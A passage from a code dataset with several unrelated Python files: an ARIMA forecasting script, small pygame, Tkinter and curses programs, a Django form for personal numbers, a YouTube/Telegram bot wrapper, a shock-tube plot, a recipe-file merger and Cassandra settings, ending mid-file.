rolstddev = indexedDataset.rolling(window=12).std()\n\n print (rolmean, rolstddev)\n # originalDataset = plt.plot(indexedDataset, color=\"blue\", label = \"Original\")\n # meanData = plt.plot(rolmean, color=\"red\", label = \"mean\")\n # stdDevData = plt.plot(rolstddev, color=\"green\", label=\"stddev\")\n # plt.show()\n\n # dickey fuller test\n from statsmodels.tsa.stattools import adfuller\n datasetTest = adfuller(indexedDataset[targetColm], autolag=\"AIC\")\n datasetOutput = pd.Series(datasetTest[0:4], index=[\"Test Statistic\", \"p-value\", \"#Lags Used\", \"Number of Observations Used\"])\n for key,value in datasetTest[4].items():\n datasetOutput[key] = value\n print (datasetOutput)\n\n # Estimating trend\n indexedDataset_logScale = np.log(indexedDataset)\n # plt.plot(indexedDataset_logScale)\n # plt.show()\n\n movingAverage = indexedDataset_logScale.rolling(window=12).mean()\n movingSTD = indexedDataset_logScale.rolling(window=12).std()\n # plt.plot(indexedDataset_logScale)\n # plt.plot(movingAverage, color='red')\n # plt.show()\n\n\n # Get the difference between the moving average and the actual number of passengers\n datasetLogScaleMinusMovingAverage = indexedDataset_logScale - movingAverage\n datasetLogScaleMinusMovingAverage.head(12)\n # Remove Nan Values\n datasetLogScaleMinusMovingAverage.dropna(inplace=True)\n datasetLogScaleMinusMovingAverage.head(10)\n\n from statsmodels.tsa.stattools import adfuller\n def test_stationarity(timeseries):\n\n # Determing rolling statistics\n movingAverage = timeseries.rolling(window=12).mean()\n movingSTD = timeseries.rolling(window=12).std()\n\n # Plot rolling statistics:\n # orig = plt.plot(timeseries, color='blue', label='Original')\n # mean = plt.plot(movingAverage, color='red', label='Rolling Mean')\n # std = plt.plot(movingSTD, color='black', label='Rolling Std')\n # plt.legend(loc='best')\n # plt.title('Rolling Mean & Standard Deviation')\n # plt.show(block=False)\n\n # Perform Dickey-Fuller test:\n print('Results of Dickey-Fuller Test:')\n dftest = adfuller(timeseries[targetColm], autolag='AIC')\n dfoutput = pd.Series(dftest[0:4],\n index=['Test Statistic', 'p-value', '#Lags Used', 'Number of Observations Used'])\n for key, value in dftest[4].items():\n dfoutput['Critical Value (%s)' % key] = value\n print(dfoutput)\n\n test_stationarity(datasetLogScaleMinusMovingAverage)\n #\n # exponentialDecayWeightedAverage = indexedDataset_logScale.ewm(halflife=12, min_periods=0, adjust=True).mean()\n # plt.plot(indexedDataset_logScale)\n # plt.plot(exponentialDecayWeightedAverage, color='red')\n #\n # datasetLogScaleMinusMovingExponentialDecayAverage = indexedDataset_logScale - exponentialDecayWeightedAverage\n # test_stationarity(datasetLogScaleMinusMovingExponentialDecayAverage)\n #\n datasetLogDiffShifting = indexedDataset_logScale - indexedDataset_logScale.shift()\n # plt.plot(datasetLogDiffShifting)\n #\n # datasetLogDiffShifting.dropna(inplace=True)\n # test_stationarity(datasetLogDiffShifting)\n #\n # from statsmodels.tsa.seasonal import seasonal_decompose\n # decomposition = seasonal_decompose(indexedDataset_logScale)\n #\n # trend = decomposition.trend\n # seasonal = decomposition.seasonal\n # residual = decomposition.resid\n #\n # plt.subplot(411)\n # plt.plot(indexedDataset_logScale, label='Original')\n # plt.legend(loc='best')\n # plt.subplot(412)\n # plt.plot(trend, label='Trend')\n # plt.legend(loc='best')\n # plt.subplot(413)\n # plt.plot(seasonal, label='Seasonality')\n # plt.legend(loc='best')\n # plt.subplot(414)\n # plt.plot(residual, label='Residuals')\n # plt.legend(loc='best')\n # plt.tight_layout()\n #\n # decomposedLogData = residual\n # decomposedLogData.dropna(inplace=True)\n # test_stationarity(decomposedLogData)\n #\n # # ACF and PACF plots:\n # from statsmodels.tsa.stattools import acf, pacf\n #\n # lag_acf = acf(datasetLogDiffShifting, nlags=20)\n # lag_pacf = pacf(datasetLogDiffShifting, nlags=20, method='ols')\n #\n # # Plot ACF:\n # plt.subplot(121)\n # plt.plot(lag_acf)\n # plt.axhline(y=0, linestyle='--', color='gray')\n # plt.axhline(y=-1.96 / np.sqrt(len(datasetLogDiffShifting)), linestyle='--', color='gray')\n # plt.axhline(y=1.96 / np.sqrt(len(datasetLogDiffShifting)), linestyle='--', color='gray')\n # plt.title('Autocorrelation Function')\n #\n # # Plot PACF:\n # plt.subplot(122)\n # plt.plot(lag_pacf)\n # plt.axhline(y=0, linestyle='--', color='gray')\n # plt.axhline(y=-1.96 / np.sqrt(len(datasetLogDiffShifting)), linestyle='--', color='gray')\n # plt.axhline(y=1.96 / np.sqrt(len(datasetLogDiffShifting)), linestyle='--', color='gray')\n # plt.title('Partial Autocorrelation Function')\n # plt.tight_layout()\n #\n # from statsmodels.tsa.arima_model import ARIMA\n #\n # # AR MODEL\n # model = ARIMA(indexedDataset_logScale, order=(2, 1, 0))\n # results_AR = model.fit(disp=-1)\n # plt.plot(datasetLogDiffShifting)\n # plt.plot(results_AR.fittedvalues, color='red')\n # plt.title('RSS: %.4f' % sum((results_AR.fittedvalues - datasetLogDiffShifting[\"#Passengers\"]) ** 2))\n # print('Plotting AR model')\n #\n # # MA MODEL\n # model = ARIMA(indexedDataset_logScale, order=(0, 1, 2))\n # results_MA = model.fit(disp=-1)\n # plt.plot(datasetLogDiffShifting)\n # plt.plot(results_MA.fittedvalues, color='red')\n # plt.title('RSS: %.4f' % sum((results_MA.fittedvalues - datasetLogDiffShifting[\"#Passengers\"]) ** 2))\n # print('Plotting AR model')\n #\n from statsmodels.tsa.arima_model import ARIMA\n model = ARIMA(indexedDataset_logScale, order=(2, 1, 2))\n results_ARIMA = model.fit(disp=-1)\n # plt.plot(datasetLogDiffShifting)\n # plt.plot(results_ARIMA.fittedvalues, color='red')\n # plt.title('RSS: %.4f' % sum((results_ARIMA.fittedvalues - datasetLogDiffShifting[targetColm]) ** 2))\n # plt.show()\n\n predictions_ARIMA_diff = pd.Series(results_ARIMA.fittedvalues, copy=True)\n print (predictions_ARIMA_diff.head())\n\n # Convert to cumulative sum\n predictions_ARIMA_diff_cumsum = predictions_ARIMA_diff.cumsum()\n print (predictions_ARIMA_diff_cumsum.head())\n\n predictions_ARIMA_log = pd.Series(indexedDataset_logScale[targetColm].ix[0],\n index=indexedDataset_logScale[targetColm].index)\n predictions_ARIMA_log = predictions_ARIMA_log.add(predictions_ARIMA_diff_cumsum, fill_value=0)\n predictions_ARIMA_log.head()\n\n predictions_ARIMA = np.exp(predictions_ARIMA_log)\n plt.plot(indexedDataset)\n plt.plot(predictions_ARIMA)\n plt.title('RMSE: %.4f' % np.sqrt(\n sum((predictions_ARIMA - indexedDataset[\"#Passengers\"]) ** 2) / len(indexedDataset[\"#Passengers\"])))\n plt.show()\n\n\n\nif __name__==\"__main__\":\n ArimaForecasting().arimaForecasting()\n\n\n","sub_path":"ArimaTest.py","file_name":"ArimaTest.py","file_ext":"py","file_size_in_byte":8492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"27215384","text":"import os\nimport pygame\nfrom pygame.locals import *\nimport sys\n\npygame.init()\nscreen = pygame.display.set_mode((500, 500), HWSURFACE | DOUBLEBUF | RESIZABLE)\npic = pygame.image.load(\"1.png\")\nscreen.blit(pygame.transform.scale(pic, (500, 500)), (0, 0))\npygame.display.flip()\npygame.mixer.music.load(\"bgm.ogg\")\npygame.mixer.music.play()\nwhile True:\n pygame.event.pump()\n event = pygame.event.wait()\n if event.type == QUIT:\n pygame.display.quit()\n sys.exit()\n elif event.type == VIDEORESIZE:\n screen = pygame.display.set_mode(\n event.dict['size'], HWSURFACE | DOUBLEBUF | RESIZABLE)\n screen.blit(pygame.transform.scale(pic, event.dict['size']), (0, 0))\n pygame.display.flip()\n","sub_path":"reminder.py","file_name":"reminder.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"14944190","text":"from tkinter import *\n\nfrom XuLyFile import DocFile, LuuFile\n\n\ndef themAction():\n line = stringMa.get() + \";\" + stringTen.get() + \";\" + stringNam.get()\n LuuFile(line)\n stringTen.set(\"\")\n stringNam.set(\"\")\n stringMa.set(\"\")\n showList()\n\n\ndef showList():\n arrSach = DocFile()\n listbox.delete(0, END)\n for item in arrSach:\n listbox.insert(END, item)\n\n\nroot = Tk()\nstringMa = StringVar()\nstringTen = StringVar()\nstringNam = StringVar()\nLabel(root, text=\"Quản Lý Sách\", fg='blue', font=(\"cambria\", 16)).grid(row=0, columnspan=2)\nroot.title(\"Quản lý sách\")\nroot.minsize(height=300, width=310)\nroot.resizable(height=True, width=True)\n\nlistbox = Listbox(root, width=50)\nlistbox.grid(row=1, columnspan=2)\nshowList()\nLabel(root, text=\"Mã sách:\").grid(row=2, column=0)\nEntry(root, width=35, textvariable=stringMa).grid(row=2, column=1)\nLabel(root, text=\"Tên sách:\").grid(row=3, column=0)\nEntry(root, width=35, textvariable=stringTen).grid(row=3, column=1)\nLabel(root, text=\"Năm xuất bản:\").grid(row=4, column=0)\nEntry(root, width=35, textvariable=stringNam).grid(row=4, column=1)\nframeButton = Frame(root)\nButton(frameButton, text=\"Thêm\", command=themAction).pack(side=LEFT)\nButton(frameButton, text=\"Tìm\").pack(side=LEFT)\nButton(frameButton, text=\"Sắp xếp\").pack(side=LEFT)\nButton(frameButton, text=\"Thoát\", command=root.quit).pack(side=LEFT)\nframeButton.grid(row=5, column=1)\nroot.mainloop()\n","sub_path":"GUI_QuanLySach/MyGui.py","file_name":"MyGui.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"493771165","text":"from threading import Thread\nfrom time import sleep\n\n\nclass AsyncCountdownTimer(Thread):\n \"\"\"\n 异步倒计时定时器。使用给定的倒计时量和反馈事件初始化,调用start方法开始计时。\n 若时间到,则调用给定的反馈事件。在定时器触发前,可以调用reset方法停止计时并复位。\n 时间到且反馈事件被触发前,定时器将自动复位。\n \"\"\"\n\n def __init__(self, seconds, callback, **kwargs):\n super().__init__()\n self.__seconds = seconds\n self.__callback = callback\n self.__kwargs = kwargs\n self.__run = True\n\n def start(self) -> None:\n \"\"\"\n 启动定时器。\n \"\"\"\n super().start()\n\n def run(self) -> None:\n __in = 0.25\n counter = self.__seconds\n self.__run = True\n while counter > 0:\n counter -= __in\n sleep(__in)\n if not self.__run: # 定时器被复位\n return\n if not self.__run:\n return\n self.__callback(**self.__kwargs)\n\n def reset(self):\n \"\"\"\n 停止计时、复位定时器。若定时器已触发,则无任何效果。\n \"\"\"\n self.__run = False\n","sub_path":"atimer.py","file_name":"atimer.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"73741585","text":"from django import forms\nfrom django.forms import ValidationError\n\nclass MobileAuthForm(forms.Form):\n pnr = forms.CharField(max_length = 12, \n help_text=\"Enter your Personal Number without whitespaces or hyphen('-')\", \n widget=forms.TextInput(attrs={'placeholder': 'yyyymmddnnnn'}), \n label = '',\n required = True\n )\n\n def clean(self):\n cleaned_data = self.cleaned_data\n pnr = cleaned_data.get('pnr', None)\n\n if len(pnr) < 12:\n raise forms.ValidationError(\"Please enter your correct Personal Number\")\n\n if '-' in pnr or \" \" in pnr:\n raise forms.ValidationError(\"Please remove whitespaces and hyphens('-') in your Personal Number input\")\n","sub_path":"bankid_sign/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"231279948","text":"# This project created by urhoba\n# www.urhoba.net\n\nfrom telegram import user\nfrom YouTubeManager import YouTubeManager\nfrom DBManager import DBManager\n\nclass UrhobA:\n#region Init \n def __init__(self) -> None:\n self.yt = YouTubeManager()\n self.dbMan = DBManager()\n if self.dbMan.CheckBotStatsWithID() == False:\n self.dbMan.AddBot()\n#endregion\n\n#region User Modules\n def CreateUser(self, userID, userName):\n if self.dbMan.CheckUserWithID(userID) == False:\n self.dbMan.AddUser(userID, userName)\n self.dbMan.BotUserCountUpdate()\n#endregion\n\n#region File Modules\n def DeleteFile(self, fileFolder):\n self.yt.DeleteFile(fileFolder)\n#endregion\n\n#region Counter Update Modules\n def SearchCountUpdateUser(self, userID, userName):\n if self.dbMan.CheckUserWithID(userID) == True:\n self.dbMan.UserSearchCountUpdate(userID)\n self.dbMan.BotSearchCountUpdate()\n else:\n self.CreateUser(userID, userName)\n \n def VideoDownloadCountUpdateUser(self, userID, userName):\n if self.dbMan.CheckUserWithID(userID) == True:\n self.dbMan.UserVideoDownloadCountUpdate(userID)\n self.dbMan.BotVideoCountUpdate()\n else:\n self.CreateUser(userID, userName)\n\n def AudioDownloadCountUpdateUser(self, userID, userName):\n if self.dbMan.CheckUserWithID(userID) == True:\n self.dbMan.UserAudioDownloadCountUpdate(userID)\n self.dbMan.BotAudioCountUpdate()\n else:\n self.CreateUser(userID, userName)\n#endregion\n\n#region Search Modules \n def SearchVideo(self, searchQuery):\n result = self.yt.SearchVideo(searchQuery)\n return result\n#endregion\n\n#region Download Modules\n def DownloadVideo(self, video_id):\n result = self.yt.DownloadVideo(video_id)\n if result == False:\n return False\n else:\n if self.dbMan.CheckVideoWithVideoID(video_id):\n self.dbMan.VideoDownloadCountUpdate(video_id)\n else:\n self.dbMan.AddVideo(result[0], result[1], result[2])\n return result[2]\n\n def DownloadAudio(self, video_id):\n result = self.yt.DownloadAudio(video_id)\n if result == False:\n return False\n else:\n if self.dbMan.CheckAudioWithAudioID(video_id):\n self.dbMan.AudioDownloadCountUpdate(video_id)\n else:\n self.dbMan.AddAudio(result[0], result[1], result[2])\n return result[2]\n#endregion\n\n#region Get Stats Modules\n def GetBotDatas(self, botID = 1):\n if self.dbMan.CheckBotStatsWithID() == True:\n datas = self.dbMan.BotDataGet()\n return datas\n#endregion\n","sub_path":"Python/UrhobATelegramYouTube/Base.py","file_name":"Base.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"601100995","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n\ndatos=np.genfromtxt('data.dat')\nXD=datos[:,0]\nRHO=datos[:,1]\nPRESION=datos[:,2]\nVELOCIDAD=datos[:,3]\n\n#Solucion analitica:\nL = 1.0\ng = 1.4\ndt = 0.001\n\nrho1 = 1.0\nrho2 = 0.125\nu1 = 0.0\nu2 = 0.0\np1 = 1.0\np2 = 0.1\n\nAl = 2./((g+1)*rho1)\nAr = 2./((g+1)*rho2)\nBl = ((g-1)/(g+1))*p1\nBr = ((g-1)/(g+1))*p2\nal = (g*p1/rho1)**0.5\nar = (g*p2/rho2)**0.5\n\ndef F(p):\n return F_shock(p) + F_rare(p) + u2 - u1\n\ndef F_shock(p):\n return (p-p2)*(Ar/(p+Br))**0.5\n\ndef F_rare(p):\n return (2.0*al/(g-1))*((p/p1)**(0.5*(g-1)/g)-1)\n\ndef US(p):\n return 0.5*(u1 + u2 + F_shock(p) - F_rare(p))\n\ndef Fprime(p):\n return (al/(g*p1))*((p1/p)**((g+1)/(2.*g))) + ((Ar/(p+Br))**0.5)*((p2-p)/(2.*(p+Br)) + 1.)\n\ndef NR(p):\n pa = p\n pn = pa - F(pa)/Fprime(pa)\n CHA = abs(pn - pa)/(0.5*(pn + pa))\n while(CHA < 10E-6):\n pa = pn\n pn = pa - F(pa)/Fprime(pa)\n CHA = abs(pn - pa)/(0.5*(pn + pa))\n\n return pn\n\ndef Solucion():\n\n p0 = 0.315\n\n Ps = NR(p0)\n Us = US(Ps)\n RhoSL = rho1*(Ps/p1)**(1./g)\n aSL = al*(Ps/p1)**((g-1)/(2.*g))\n SHL = u1 - al\n STL = Us - aSL\n RhoSR = rho2*(((Ps/p2)+((g-1.)/(g+1.)))/(((g-1.)/(g+1.))*(Ps/p2) + 1.))\n SR = u2 + ar*((((g+1)/(2.*g))*(Ps/p2)) + ((g-1.)/(2.*g)))**(0.5)\n\n X = np.linspace(0,1,100)\n P = np.zeros(100)\n Rho = np.zeros(100)\n U = np.zeros(100)\n\n t=0\n run = True\n \n while(run == True):\n t = t + dt\n for i in range(1,100):\n p = 0\n r = 0\n u = 0 \n x = X[i] - 0.5\n xt = x/t\n\n if(xt <= SHL):\n p = p1\n r = rho1\n u = u1\n elif(SHL < xt <= STL):\n p = p1*((2./(g+1.)) + (g-1.)/(al*(g+1))*(u1 - xt))**((2.*g)/(g-1.))\n r = rho1*((2./(g+1.)) + (g-1.)/(al*(g+1))*(u1 - xt))**(2./(g-1.))\n u = (2./(g+1.))*(al + ((g-1)*u1)/2. + xt)\n elif(STL < xt <= Us):\n p = Ps\n r = RhoSL\n u = Us\n elif(Us < xt <= SR):\n p = Ps\n r = RhoSR\n u = Us\n else:\n p = p2\n r = rho2\n u = u2\n \n P[i] = p\n Rho[i] = r\n U[i] = u\n\n if(abs(U[90]-U[89]) > 0):\n run = False\n \n return P,Rho,U,X\n\n\nPA, RA, UA, XA = Solucion()\n\nplt.subplot(311)\nplt.scatter(XD,PRESION,color='yellow',label='Computacional')\nplt.plot(XA,PA,color='black',label='Analitica')\nplt.title(\"Presion\")\nplt.legend()\n\nplt.subplot(312)\nplt.scatter(XD,RHO,color='green',label='Computacional')\nplt.plot(XA,RA,color='black',label='Analitica')\nplt.title(\"Densidad\")\nplt.legend()\n\nplt.subplot(313)\nplt.scatter(XD,VELOCIDAD,color='pink',label='Computacional')\nplt.plot(XA,UA,color='black',label='Analitica')\nplt.title(\"Velocidad\")\nplt.legend()\n\nplt.savefig(\"Graficas.pdf\")\nplt.show()\n \n\n\n\n\n\n","sub_path":"grf.py","file_name":"grf.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"388894338","text":"\"\"\"\r\nRecipe merging follows very different rules from the other \r\nconfig files. \r\n\r\nWhile some of it can be abstracted to use the same machinery, \r\nit is easier to just rewrite (most) of the logic and handle\r\nthe differences manually. It can be refactored later if need\r\nbe.\r\n\r\nThe high level approach to merging recipes uses basically\r\nthe same logic as other merge scripts, with the recipe name\r\nas the 'key' and the steps within the recipe as the 'value'. \r\nThe biggest difference is migrating a user's custom recipes \r\nfrom their old file to the new one. \r\n\r\nThe biggest challenge with this process is ensuring that all\r\nglobal names are actually valid. The easiest way to do this \r\nrequires having a copy of the logger settings file, which \r\ncontains all global names. This requires an extra command \r\nline argument, which doesn't play nicely with the \r\nrest of the cli, and requires special handling in merge.py. \r\n\r\nThe way I decided to do this was to use parse_known_args()\r\ninstead of parse_args(), and attach the remainder of the \r\nun-parsed arguments to the options object. This file can\r\nthen use a second parser on the remaining argument(s) to\r\nextract the logger settings file reference. \r\n\r\nOne subtlety that arises is that there doesn't seem to be a \r\nrestriction on recipe names, so we need to check for duplicate\r\nnames in the recipe list and bail if we encounter that. Since\r\nonly a super dumb ass would actually do that, this shouldn't\r\nbe a problem for real-world, but is trivial to implement. \r\n\r\n\"\"\"\r\n\r\nimport argparse\r\nfrom cfg_compare import Merger\r\nfrom collections import OrderedDict\r\nfrom exceptions import SanityError\r\nfrom itertools import zip_longest\r\n\r\n\r\nclass BaseStep():\r\n def __init__(self, var):\r\n self.var = var\r\n\r\n def tostr(self):\r\n raise NotImplementedError()\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, self.__class__):\r\n return NotImplemented\r\n return self.tostr() == other.tostr()\r\n\r\n\r\nclass WaitStep(BaseStep):\r\n def __init__(self, time, unit):\r\n super().__init__(None)\r\n self.time = time\r\n self.unit = unit\r\n\r\n def tostr(self):\r\n return \"Wait %s %s\" % (self.time, self.unit)\r\n\r\n\r\nclass WaitUntilStep(BaseStep):\r\n def __init__(self, var, op, val):\r\n super().__init__(var)\r\n self.op = op\r\n self.val = val\r\n\r\n def tostr(self):\r\n return \"Wait until \\\"%s\\\" %s %s\"%(self.var, self.op, self.val)\r\n\r\n\r\nclass SetStep(BaseStep):\r\n def __init__(self, var, val):\r\n super().__init__(var)\r\n self.val = val\r\n\r\n def tostr(self):\r\n return \"Set \\\"%s\\\" to %s\"%(self.var, self.val)\r\n\r\n\r\nclass Recipe():\r\n def __init__(self, name, lines):\r\n self.name = name\r\n self.lines = lines\r\n self.steps = []\r\n for l in lines:\r\n self.create_step(l)\r\n\r\n def steps_with_vars(self):\r\n for step in self:\r\n if step.var is not None:\r\n yield step\r\n\r\n @classmethod\r\n def EmptyRecipe(cls):\r\n return cls(\"\", [])\r\n\r\n def empty(self):\r\n return len(self.steps) == 0\r\n\r\n def __iter__(self):\r\n return iter(self.steps)\r\n\r\n def create_step(self, l):\r\n\r\n # fancy unpacking is like cheating\r\n # for splitting and rejoining strings\r\n # with known beginning and middle but\r\n # unknown number of middle segments. \r\n # otherwise you'd need a bunch of code\r\n # or a regex to do this so easily\r\n\r\n svar = None\r\n if l.startswith(\"Wait\"):\r\n if l.startswith(\"Wait until\"):\r\n _, _, *var, op, val = l.split()\r\n svar = \" \".join(var)\r\n s = WaitUntilStep(svar.strip('\"'), op, val)\r\n else:\r\n try:\r\n _, time, unit = l.split()\r\n except ValueError:\r\n # malformed line e.g. \"Wait 260seconds\"\r\n raise SanityError(\"Malformed wait step: \\\"%s\\\"\"%l) from None\r\n s = WaitStep(time, unit)\r\n elif l.startswith(\"Set\"):\r\n _, *var, _, val = l.split()\r\n svar = \" \".join(var)\r\n s = SetStep(svar.strip('\"'), val)\r\n else:\r\n raise SanityError(\"Unknown step type for line: '%s'\"%l)\r\n\r\n if svar is not None and (svar[0] != '\"' or svar[-1] != '\"'):\r\n raise SanityError(\"Parse failed for line: '%s'\"%l)\r\n\r\n self.steps.append(s)\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, self.__class__):\r\n return NotImplemented\r\n if self.name != other.name:\r\n return False\r\n return self.steps == other.steps\r\n\r\ndef _parse_recipes(recipes, lit, ff):\r\n while True:\r\n l = next(lit)\r\n if l == \"\":\r\n continue\r\n func, name = l.split(\" \", 1)\r\n if func != \"Func\":\r\n raise SanityError(\"malformed file: '%s'\"%ff)\r\n lines = []\r\n while True:\r\n l = next(lit, None)\r\n if not l:\r\n break\r\n lines.append(l)\r\n if not lines:\r\n continue\r\n #raise SanityError(\"Empty recipe in '%s': '%s'\"%(ff, name))\r\n recipes[name] = Recipe(name, lines)\r\n\r\n\r\ndef _parse_logger(ff):\r\n # no sanity checking here since the\r\n # logger settings file is just for \r\n # reference, not validation. \r\n # Just don't retard. \r\n with open(ff, 'r') as f:\r\n _ = f.readline() # header\r\n lines = f.read().splitlines()\r\n settings = set()\r\n for l in lines:\r\n name, _ = l.split(\"\\t\", 1)\r\n settings.add(name)\r\n return settings\r\n\r\n\r\nclass RecipeMerger(Merger):\r\n\r\n def parse(self, ff):\r\n with open(ff, 'r') as f:\r\n lines = f.read().splitlines()\r\n recipes = OrderedDict()\r\n lit = iter(lines)\r\n try:\r\n _parse_recipes(recipes, lit, ff)\r\n except StopIteration:\r\n pass\r\n return recipes\r\n\r\n def notfound(self, recipe):\r\n if self.options.ignore_deleted and recipe not in self.options.never_ignore:\r\n if recipe in self.of and not recipe in self.cf:\r\n cs = \"???\"\r\n os = self.v2s(recipe, self.getvar(self.of, recipe))\r\n ns = \"\"\r\n m = \"ignore\"\r\n a = \"ignore\"\r\n self.setvar(self.nf, recipe, Recipe.EmptyRecipe())\r\n return cs, os, ns, m, a\r\n\r\n def sanitycheck(self):\r\n\r\n # other sanity checking is done during\r\n # the parsing phase\r\n out = self.options.v\r\n def check(file, fn, warning=False):\r\n for recipe in file.values():\r\n for i, step in enumerate(recipe.steps, 1):\r\n if step.var is None:\r\n continue\r\n if step.var not in self.settings:\r\n if warning:\r\n out(\"Unknown variable '%s' in recipe '%s' line %d\"%(step.var, recipe.name, i))\r\n else:\r\n raise SanityError(\"Invalid variable '%s' in file '%s'\"%(step.var, fn))\r\n def checkvars(container):\r\n for var in container:\r\n if var not in self.settings:\r\n raise SanityError(\"Bad variable name: '%s'\"%var)\r\n check(self.cf, 'user', True)\r\n check(self.of, 'old')\r\n check(self.nf, 'new')\r\n checkvars(self.options.translate_new)\r\n checkvars(self.options.use_new)\r\n checkvars(self.options.use_user)\r\n checkvars(self.options.force)\r\n\r\n def convert_vars(self, f):\r\n \r\n # translate renamed variables to \r\n # their new names and remove any\r\n # depreciated variables. \r\n # Issue a warning whenever a depreciated\r\n # variable step is removed from a recipe\r\n\r\n # make a copy of the list for iteration\r\n # and remove steps from the original when\r\n # identified. Mutate step.var in place \r\n # when translating names. \r\n\r\n told = self.options.translate_old\r\n depr = self.options.depreciated\r\n out = self.options.v\r\n for recipe in f.values():\r\n steps = recipe.steps.copy()\r\n for j, step in enumerate(steps, 1):\r\n var = step.var\r\n if var in depr:\r\n out(\"Removing '%s' step %d with depreciated variable: '%s'\"%(recipe.name, j, var))\r\n recipe.steps.remove(step)\r\n else:\r\n var = told.get(var, None) # get told\r\n if var is not None:\r\n out(\"Translating '%s' step %d '%s' -> '%s'\"%(recipe.name, j, step.var, var))\r\n step.var = var\r\n\r\n def post_parse(self):\r\n \"\"\" Load the settings file and use\r\n the translate_old dict to translate names\r\n now rather than waiting. \r\n\r\n When the files are sanity checked, they will\r\n all have the updated variable names (assuming\r\n of course that the patch file is correct :). \r\n \"\"\"\r\n self.settings = _parse_logger(self.options.loggersettings)\r\n self.convert_vars(self.cf)\r\n self.convert_vars(self.of)\r\n\r\n def _merge(self):\r\n \"\"\"\r\n The merge logic here is somewhat different from\r\n the standard, since we expect customers to have\r\n their own custom recipes. \r\n\r\n Perform merge in two passes:\r\n 1. Fix the standard recipes by running through\r\n the default merge logic.\r\n\r\n 2. Loop through customer's file for any non-default\r\n recipes and merge them into the new file. Skip \r\n a recipe IF:\r\n * The user's copy is present in the old reference\r\n * The user's copy is not present in the new reference\r\n * the user's copy matches the old reference\r\n \"\"\"\r\n super()._merge()\r\n cf = self.cf\r\n of = self.of\r\n nf = self.nf\r\n ol = self.outlogger.lines\r\n for name in cf:\r\n if name in nf:\r\n continue\r\n elif name in of:\r\n cv = cf[name]\r\n if cv == of[name]:\r\n ol.append((name, \"\", \"\", \"\", \"deprec\", \"skip\"))\r\n continue\r\n else:\r\n ol.append((name, \"\", \"\", \"N N\", \"user\"))\r\n nf[name] = cv\r\n else:\r\n ol.append((name, \"\", \"\", \"\", \"custom\", \"user\"))\r\n nf[name] = cf[name]\r\n\r\n\r\n def v2s(self, name, v):\r\n return \"Recipe('%s')\"%v.name\r\n\r\n def output(self, f):\r\n buf = []\r\n for name, recipe in f.items():\r\n if recipe.empty():\r\n continue\r\n buf.append(\"Func %s\"%name)\r\n for step in recipe:\r\n buf.append(step.tostr())\r\n buf.append(\"\")\r\n buf.append(\"\") # files end with two blanks for some reason\r\n return \"\\n\".join(buf)\r\n\r\n\r\ndef merge_recipes(options):\r\n p = argparse.ArgumentParser()\r\n p.add_argument(\"--loggersettings\")\r\n p.add_argument(\"--ignore-deleted\", action=\"store_true\")\r\n p.add_argument(\"--never-ignore\")\r\n args, other = p.parse_known_args(options.other)\r\n options.loggersettings = args.loggersettings\r\n options.other = other\r\n options.ignore_deleted = args.ignore_deleted\r\n\r\n if args.never_ignore:\r\n never_ignore = args.never_ignore.split(\";\")\r\n options.never_ignore = set(never_ignore)\r\n else:\r\n options.never_ignore = set()\r\n\r\n return RecipeMerger(options).merge()\r\n\r\n\r\nfrom file_types import register\r\nregister(\"recipes\", merge_recipes)","sub_path":"tools/patcher/src/merge/mergers/merge_recipes.py","file_name":"merge_recipes.py","file_ext":"py","file_size_in_byte":11703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"178977214","text":"from curses import wrapper\nfrom curses.textpad import Textbox, rectangle\nimport curses\nimport time\n\ndef main(output):\n ouput = curses.initscr()\n field = curses.newwin(2, curses.COLS, curses.LINES - 3, 0)\n curses.start_color()\n curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)\n curses.init_pair(2, curses.COLOR_BLACK, curses.COLOR_YELLOW)\n output.bkgd(curses.color_pair(1))\n field.bkgd(curses.color_pair(2))\n box = Textbox(field)\n box.edit()\n\nif __name__ == \"__main__\":\n wrapper(main)\n","sub_path":"client/cursestest.py","file_name":"cursestest.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"187053645","text":"import socket\nimport os\n\n\ndef ips(hostnames):\n result = []\n hostnames = hostnames.split(',')\n for v in hostnames:\n if v == '':\n continue\n try:\n socket.inet_aton(v) # test legal IP\n result.append(v)\n except socket.error as e1: # Not legal IP\n print(e1)\n try:\n ip = socket.gethostbyname(v) # returns the IP unchanged for an IP\n result.append(ip)\n except Exception as e:\n print(e)\n return result\n\nKEYSPACE = os.getenv('DRASTIC_KEYSPACE', 'drastic')\nLOG_LEVEL = os.getenv('DRASTIC_LOG_LEVEL', 'WARN')\nCASSANDRA_HOSTS = ips(os.getenv('CASSANDRA_HOSTNAMES', 'cassandra-1'))\nREPLICATION_FACTOR = int(os.getenv('CASSANDRA_REPLICATION_FACTOR', '2'))\nCONSISTENCY_LEVEL = int(os.getenv('CASSANDRA_CONSISTENCY_LEVEL', '2'))\n\nif __name__ == '__main__':\n print('hosts: {0}'.format(str(CASSANDRA_HOSTS)))\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"418871630","text":"from django.conf.urls import patterns, url\n\nfrom discover import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, 